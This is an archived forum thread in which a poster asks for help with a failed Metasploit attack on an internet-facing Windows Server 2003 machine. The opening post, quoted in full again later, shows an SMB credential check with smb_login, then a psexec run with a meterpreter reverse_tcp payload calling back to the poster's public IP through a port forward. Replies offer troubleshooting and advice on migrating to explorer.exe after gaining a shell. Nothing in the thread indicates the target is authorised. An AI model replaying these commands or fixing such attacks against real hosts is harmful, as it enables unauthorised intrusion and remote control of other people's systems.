Archived

This topic is now archived and is closed to further replies.

mbarakoda

Can You Let Me Know What Is The Problem With This Exploit?

4 posts in this topic

Target OS: Windows 2003 SP2 EN

Target public ip : XX.XX.XX.XX

Target Open port: 445

My OS: windows 7

My public ip : YY.YY.YY.YY

my local ip: 192.168.2.42

my router SMC

Due to the fact that the target is not on the same LAN, and the attach will be over the internet, i start with setting port forward from router settings as the following:

Name:AUTH - Protocol:TCP/UDP - WAN Port:4444 - Server Host Port:4444 - Server IP Address 192.168.2.42

I installed metasploit and start with checking if the credentials are valid or not by running scanner/smb/smb_login as following

msf> use scanner/smb/smb_login

msf auxiliary(smb_login) > set rhosts XX.XX.XX.XX

rhosts => XX.XX.XX.XX

msf auxiliary(smb_login) > set smbuser root

smbuser => root

msf auxiliary(smb_login) > set smbpass password

smbpass => password

msf auxiliary(smb_login) > run

[*] XX.XX.XX.XX:445 SMB - Starting SMB login bruteforce

[-] XX.XX.XX.XX - This system allows guest sessions with any credentials, these instances will not be reported.

[-] XX.XX.XX.XX:445 SMB - [1/3] - |WORKGROUP - FAILED LOGIN (Windows Server 2003 3790 Service Pack 2) root : (STATUS_LOGON_FAILURE)

[-] XX.XX.XX.XX:445 SMB - [2/3] - |WORKGROUP - FAILED LOGIN (Windows Server 2003 3790 Service Pack 2) root : root (STATUS_LOGON_FAILURE)

[*] Auth-User: "root"

[+] XX.XX.XX.XX:445|WORKGROUP - SUCCESSFUL LOGIN (Windows Server 2003 3790 Service Pack 2) 'root' : 'password'

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

then after login successful, i try to use exploit/windows/smb/psexec to exploit the server by the following:

msf > use exploit/windows/smb/psexec

msf exploit(psexec) > set rhost XX.XX.XX.XX

rhost => XX.XX.XX.XX

msf exploit(psexec) > set smbuser root

smbuser => root

msf exploit(psexec) > set smbpass password

smbpass => password

msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf exploit(psexec) > set lhost YY.YY.YY.YY

lhost => YY.YY.YY.YY

msf exploit(psexec) > set lport 4444

lport => 4444

msf exploit(psexec) > exploit

[-] Handler failed to bind to YY.YY.YY.YY:4444

[*] Started reverse handler on 0.0.0.0:4444

[*] Connecting to the server...

[*] Authenticating to XX.XX.XX.XX:445|WORKGROUP as user 'root'...

[*] Uploading payload...

[-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_ACCESS_DENIED (Command=117 WordCount=0)

but as you see the exploit failed although the credentials are valid and confirmed above, can you help me understand what's wrong on the above?

0

Share this post


Link to post
Share on other sites

It could be that the vulnerability is already patched.

0

Share this post


Link to post
Share on other sites
[-] Handler failed to bind to YY.YY.YY.YY:4444

Whats running locally already on 4444?

Also, what OS is the target? Windows, or Linux runnung SMB? User root on a windows box seems unlikely, where as I could see it on a linux machine running samba, which if you think about it, I don't think psexec works on linux as a payload, but I could be wrong..

If you got a shell popped, try migrating to a process like explorer.exe and then see where or what your commands are/can do.

0

Share this post


Link to post
Share on other sites

Target OS: Windows 2003 SP2 EN

Target public ip : XX.XX.XX.XX

Target Open port: 445

My OS: windows 7

My public ip : YY.YY.YY.YY

my local ip: 192.168.2.42

my router SMC

Due to the fact that the target is not on the same LAN, and the attach will be over the internet, i start with setting port forward from router settings as the following:

Name:AUTH - Protocol:TCP/UDP - WAN Port:4444 - Server Host Port:4444 - Server IP Address 192.168.2.42

I installed metasploit and start with checking if the credentials are valid or not by running scanner/smb/smb_login as following

msf> use scanner/smb/smb_login

msf auxiliary(smb_login) > set rhosts XX.XX.XX.XX

rhosts => XX.XX.XX.XX

msf auxiliary(smb_login) > set smbuser root

smbuser => root

msf auxiliary(smb_login) > set smbpass password

smbpass => password

msf auxiliary(smb_login) > run

[*] XX.XX.XX.XX:445 SMB - Starting SMB login bruteforce

[-] XX.XX.XX.XX - This system allows guest sessions with any credentials, these instances will not be reported.

[-] XX.XX.XX.XX:445 SMB - [1/3] - |WORKGROUP - FAILED LOGIN (Windows Server 2003 3790 Service Pack 2) root : (STATUS_LOGON_FAILURE)

[-] XX.XX.XX.XX:445 SMB - [2/3] - |WORKGROUP - FAILED LOGIN (Windows Server 2003 3790 Service Pack 2) root : root (STATUS_LOGON_FAILURE)

[*] Auth-User: "root"

[+] XX.XX.XX.XX:445|WORKGROUP - SUCCESSFUL LOGIN (Windows Server 2003 3790 Service Pack 2) 'root' : 'password'

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

then after login successful, i try to use exploit/windows/smb/psexec to exploit the server by the following:

msf > use exploit/windows/smb/psexec

msf exploit(psexec) > set rhost XX.XX.XX.XX

rhost => XX.XX.XX.XX

msf exploit(psexec) > set smbuser root

smbuser => root

msf exploit(psexec) > set smbpass password

smbpass => password

msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf exploit(psexec) > set lhost YY.YY.YY.YY

lhost => YY.YY.YY.YY

msf exploit(psexec) > set lport 4444

lport => 4444

msf exploit(psexec) > exploit

[-] Handler failed to bind to YY.YY.YY.YY:4444

[*] Started reverse handler on 0.0.0.0:4444

[*] Connecting to the server...

[*] Authenticating to XX.XX.XX.XX:445|WORKGROUP as user 'root'...

[*] Uploading payload...

[-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_ACCESS_DENIED (Command=117 WordCount=0)

but as you see the exploit failed although the credentials are valid and confirmed above, can you help me understand what's wrong on the above?

I found something related to your problem, I don't know if you have seen it or not, but here's the URL.

http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash

0

Share this post


Link to post
Share on other sites